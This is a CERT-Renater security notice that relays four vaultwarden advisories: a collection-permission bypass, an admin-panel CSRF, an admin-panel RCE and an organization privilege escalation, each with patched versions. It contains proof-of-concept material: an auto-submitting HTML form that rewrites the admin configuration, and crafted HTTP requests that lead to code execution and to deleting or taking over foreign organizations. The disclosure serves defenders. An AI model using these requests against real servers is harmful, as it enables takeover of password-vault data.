Ce mail provient de l'extérieur, restons vigilants

=====================================================================

                            CERT-Renater

                Note d'Information No. 2026/VULN185
_____________________________________________________________________

DATE                : 18/02/2026

HARDWARE PLATFORM(S): /

OPERATING SYSTEM(S): Systems running vaultwarden versions prior
                                 to 1.35.3.

=====================================================================
https://github.com/dani-garcia/vaultwarden/security/advisories/GHSA-h265-g7rm-h337
https://github.com/dani-garcia/vaultwarden/security/advisories/GHSA-f7r5-w49x-gxm3
https://github.com/dani-garcia/vaultwarden/security/advisories/GHSA-h6cc-rc6q-23j4
https://github.com/dani-garcia/vaultwarden/security/advisories/GHSA-j4h8-vch3-f797
_____________________________________________________________________


Full Cipher Enumeration Ignoring Organization Collection Permissions
Moderate
dani-garcia published GHSA-h265-g7rm-h337 Feb 11, 2026

Package
vaultwarden

Affected versions
<= 1.35.2

Patched versions
1.35.3


Description

A regular organization member can retrieve all ciphers within an
organization, regardless of collection permissions.
The endpoint /ciphers/organization-details is accessible to any
organization member and internally uses Cipher::find_by_org to retrieve
all ciphers. These ciphers are returned with
CipherSyncType::Organization without enforcing collection-level access
control.


Attack Preconditions

    The attacker is a member of the target organization
(User, Manager, Admin, or Owner).
    The organization contains one or more collections to which the
attacker does not have access.

Attack Scenario

    The attacker (a regular organization member) joins the organization.
    The attacker calls /ciphers/organization-details for the organization,
including collections they do not have permission to access.
    The response contains all ciphers in the organization, ignoring
collection restrictions, allowing the attacker to obtain other
members’ data (encrypted cipher data, keys, and attachment metadata).


Potential Impact

    Collection-based access separation within the organization is
bypassed, significantly reducing data confidentiality.
    Access to encrypted cipher data, keys, and attachment metadata
may directly lead to data disclosure if client-side decryption is
possible.

Severity
Moderate
6.5/ 10

CVSS v3 base metrics
Attack vector
Network
Attack complexity
Low
Privileges required
Low
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
None
Availability
None
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

CVE ID
CVE-2026-26012

Weaknesses
Weakness CWE-863

Credits

    @odgrso odgrso Reporter
    @BlackDex BlackDex Remediation developer

_____________________________________________________________________


Getting access to the Admin Panel via CSRF
High
dani-garcia published GHSA-f7r5-w49x-gxm3 Jan 25, 2025

Package
vaultwarden/server (Docker Hub)

Affected versions
<=1.32.7

Patched versions
1.33.0


Description

Summary

Attacker can create malicious html page that sends http request to the
vaultwarden admin page for change.
HTTP server doesn't verify Content-Type header. This requires the
DISABLE_ADMIN_TOKEN option to be enabled, as the authentication cookie
will not be sent across site boundaries.


PoC

Following html code will change the PIN after victim visit:

<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Document</title>
</head>
<body>

    <form action="http://0.0.0.0:8083/admin/config" method="POST" enctype="text/plain">
      <input type="text" name='{"sends_allowed":true,"disable_icon_download":false,
"signups_allowed":true,"signups_verify":false,"invitations_allowed":true,
"emergency_access_allowed":true,"email_change_allowed":true,
"password_hints_allowed":true,"show_password_hint":false,
"http_request_block_non_global_ips":true,"disable_2fa_remember":false,
"authenticator_disable_time_drift":false,"require_device_email":false,
"reload_templates":false,"increase_note_size_limit":false,
"_enable_yubico":true,"_enable_duo":true,"_enable_smtp":true,
"use_sendmail":false,"smtp_embed_images":true,"smtp_accept_invalid_certs":false,
"smtp_accept_invalid_hostnames":false,"_enable_email_2fa":false,
"email_2fa_enforce_on_verified_invite":false,"email_2fa_auto_fallback":false,
"user_attachment_limit":null,"org_attachment_limit":null,"user_send_limit":null,
"trash_auto_delete_days":null,"incomplete_2fa_time_limit":3,
"signups_verify_resend_time":3600,"signups_verify_resend_limit":6,
"password_iterations":600000,"icon_redirect_code":302,"icon_cache_ttl":2592000,
"icon_cache_negttl":259200,"icon_download_timeout":10,"admin_session_lifetime":20,
"smtp_port":587,"smtp_timeout":15,"email_token_size":6,
"email_expiration_time":600,"email_attempts_limit":3,
"domain":"http://localhost/","hibp_api_key":null,
"signups_domains_whitelist":null,"org_creation_users":null,
"admin_token":"TEST_ADMIN_TOKEN","invitation_org_name":"Vaultwarden",
"ip_header":"X-Real-IP","http_request_block_regex":null,
"log_timestamp_format":"%Y-%m-%d %H:%M:%S.%3f",
"allowed_iframe_ancestors":null,"allowed_connect_src":null,
"yubico_client_id":null,"yubico_secret_key":null,"yubico_server":null,
"duo_ikey":null,"duo_skey":null,"duo_host":null,"sendmail_command":null,
"smtp_host":null,"smtp_security":"starttls","smtp_from":null,
"smtp_from_name":"Vaultwarden","smtp_username":null,"smtp_password":null,
"smtp_auth_mechanism":null,"helo_name":null,"test": "' value='a"}'>
      <input type="submit">
    </form>
    <script>
      document.forms[0].submit()
    </script>
</body>
</html>


Severity
High
7.1/ 10

CVSS v3 base metrics
Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
Required
Scope
Unchanged
Confidentiality
Low
Integrity
High
Availability
None
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N

CVE ID
No known CVE

Weaknesses
Weakness CWE-352

Credits

    @ElizarBatin ElizarBatin Reporter
    @BlackDex BlackDex Remediation developer
    @dani-garcia dani-garcia Remediation reviewer


_____________________________________________________________________


RCE in the admin panel
High
dani-garcia published GHSA-h6cc-rc6q-23j4 Jan 25, 2025

Package
vaultwarden/server (Docker Hub)

Affected versions
<=1.32.7

Patched versions
1.33.0


Description

Summary

Attacker with authenticated access to the vaultwarden admin panel can
execute arbitrary code in the system.


PoC

Specify settings as shown below on the image.

2


Then set read-only option Icon cache folder by sending
POST /admin/config request manually:

POST /admin/config HTTP/1.1
Host: 127.0.0.1:8001
Content-Type: application/json
Cookie: VW_ADMIN=

{
    ...
    "icon_cache_folder":"/@icon"
}

Execute following command for craft payload:

After that serve image on remote server with name
apple-touch-icon.png or favicon.ico.

Download it on vaultwarden host by GET /icons/site.com/icon.png
request.

We can see @icon directory and site.com.png file on the vaultwarden
host.

20250114_19h01m38s_grim

Finally, make an http request to execute code

POST /admin/test/smtp HTTP/1.1
Host: 127.0.0.1:8001
Cookie: VW_ADMIN=<JWT>

{"email":"test@test.com"}

20250114_19h05m20s_grim


Severity
High
7.2/ 10

CVSS v3 base metrics
Attack vector
Network
Attack complexity
Low
Privileges required
High
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CVE ID
CVE-2025-24364

Weaknesses
No CWEs

Credits

    @ElizarBatin ElizarBatin Reporter
    @BlackDex BlackDex Remediation developer
    @dani-garcia dani-garcia Remediation reviewer


_____________________________________________________________________


Escalation of privilege via variable confusion in OrgHeaders trait
High
dani-garcia published GHSA-j4h8-vch3-f797 Jan 25, 2025

Package
vaultwarden/server (Docker Hub)

Affected versions
<=1.32.7

Patched versions
1.33.0


Description

Summary

Attacker can obtain owner rights of other organization. Hacker should
know the ID of victim organization (in real case the user can be a
part of the organization as an unprivileged user) and be the
owner/admin of other organization (by default you can create your
own organization) in order to attack.


Details

Vulnerable part of code is located in src/auth.rs in OrgHeaders trait.

Server finds url_org_id, then gets membership and type of membership
by this var. Lets review how server gets url_org_id.

1


Here we can see two if conditions. Server tries to get organization UUID
from the path param and then the same from the GET query. If we specify
GET query and path param both, value from GET query will overwrite the
value from path param. Also we can see that most of endpoints in
src/api/core/organizations.rs get organization UUID from path param and
do not use organizationId GET query value. Thus we can interact with
the first organization having rights of the second one.


PoC

    Foreign organization deletion
    DELETE /api/organizations/<UUID1>?organizationId=<UUID2>
    Where UUID1 -- foreign organization, UUID2 -- organization
where attacker has owner/admin rights.

    Foreign organization privilege escalation.

Inviting user in victim organization

POST /api/organizations/<UUID1>/users/invite?organizationId=<UUID2>

{"emails":["attacker@site.com"],"collections":[],"accessAll":true,"permissions":{"response":null},"type":0,"groups":[],"accessSecretsManager":false}

Where UUID1 -- foreign organization, UUID2 -- organization where
attacker has owner/admin rights.

Confirm user enrollment in the victim organization

POST /api/organizations/<UUID1>/users/<ATTACKER_USER_UUID>/confirm?organizationId=<UUID2>

{"key":<KEY>}

Where UUID1 -- foreign organization, UUID2 -- organization where
attacker has owner/admin rights, ATTACKER_USER_UUID -- UUID of
attacker.


Severity
High
8.1/ 10

CVSS v3 base metrics
Attack vector
Network
Attack complexity
Low
Privileges required
Low
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
None
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

CVE ID
CVE-2025-24365

Weaknesses
Weakness CWE-284

Credits

    @ElizarBatin ElizarBatin Reporter
    @BlackDex BlackDex Remediation developer
    @dani-garcia dani-garcia Remediation reviewer


=========================================================
+ CERT-RENATER        |    tel : 01-53-94-20-44         +
+ 23/25 Rue Daviel    |    fax : 01-53-94-20-41         +
+ 75013 Paris         |   email:cert@support.renater.fr +
=========================================================